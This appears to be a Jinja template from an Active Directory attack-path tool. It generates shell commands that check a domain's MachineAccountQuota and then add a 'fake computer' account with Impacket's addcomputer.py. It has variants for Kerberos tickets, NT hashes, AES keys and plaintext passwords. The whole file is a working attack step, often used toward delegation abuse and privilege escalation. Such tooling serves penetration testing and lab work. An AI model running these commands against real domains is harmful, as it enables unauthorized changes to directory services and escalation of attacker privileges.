{% set computer = require['object'] %}
# Check if the machine account quota is > zero, otherwise this scenario will not work
# you can edit config.ml to set AllowAddComputer to false
{% if parent.krb_auth %}
./tools/getbysam.py '{{fqdn}}/{{parent.obj.name}}@{{dc_name}}' -dc-ip {{dc_ip}} -k -t {{domain_short_name}} -use-ldaps | grep MachineAccountQuota -A 2
{%- elif parent.secret_type == T_SECRET_NTHASH %}
./tools/getbysam.py '{{fqdn}}/{{parent.obj.name}}@{{dc_name}}' -dc-ip {{dc_ip}} -hashes :{{parent.secret}} -t {{domain_short_name}} -use-ldaps | grep MachineAccountQuota -A 2
{%- elif parent.secret_type == T_SECRET_AESKEY %}
./tools/getbysam.py '{{fqdn}}/{{parent.obj.name}}@{{dc_name}}' -dc-ip {{dc_ip}} -k -aesKey {{parent.secret}} -t {{domain_short_name}} -use-ldaps | grep MachineAccountQuota -A 2
{%- elif parent.secret_type == T_SECRET_PASSWORD %}
./tools/getbysam.py '{{fqdn}}/{{parent.obj.name}}:{{parent.secret}}@{{dc_name}}' -dc-ip {{dc_ip}} -t {{domain_short_name}} -use-ldaps | grep MachineAccountQuota -A 2
{% endif %}

# Add a fake computer in the domain
{% if parent.krb_auth %}
addcomputer.py '{{fqdn}}/{{parent.obj.name}}' -dc-ip {{dc_ip}} -k -no-pass -computer-name '{{computer.obj.name}}' -computer-pass '{{computer.secret}}' -method SAMR -dc-host {{dc_name}}
{%- elif parent.secret_type == T_SECRET_NTHASH %}
addcomputer.py '{{fqdn}}/{{parent.obj.name}}' -dc-ip {{dc_ip}} -hashes :{{parent.secret}} -computer-name '{{computer.obj.name}}' -computer-pass '{{computer.secret}}' -method SAMR
{%- elif parent.secret_type == T_SECRET_AESKEY %}
addcomputer.py '{{fqdn}}/{{parent.obj.name}}' -dc-ip {{dc_ip}} -k -no-pass -aesKey {{parent.secret}} -computer-name '{{computer.obj.name}}' -computer-pass '{{computer.secret}}' -method SAMR
{%- elif parent.secret_type == T_SECRET_PASSWORD %}
addcomputer.py '{{fqdn}}/{{parent.obj.name}}:{{parent.secret}}' -dc-ip {{dc_ip}} -computer-name '{{computer.obj.name}}' -computer-pass '{{computer.secret}}' -method SAMR
{%- endif %}
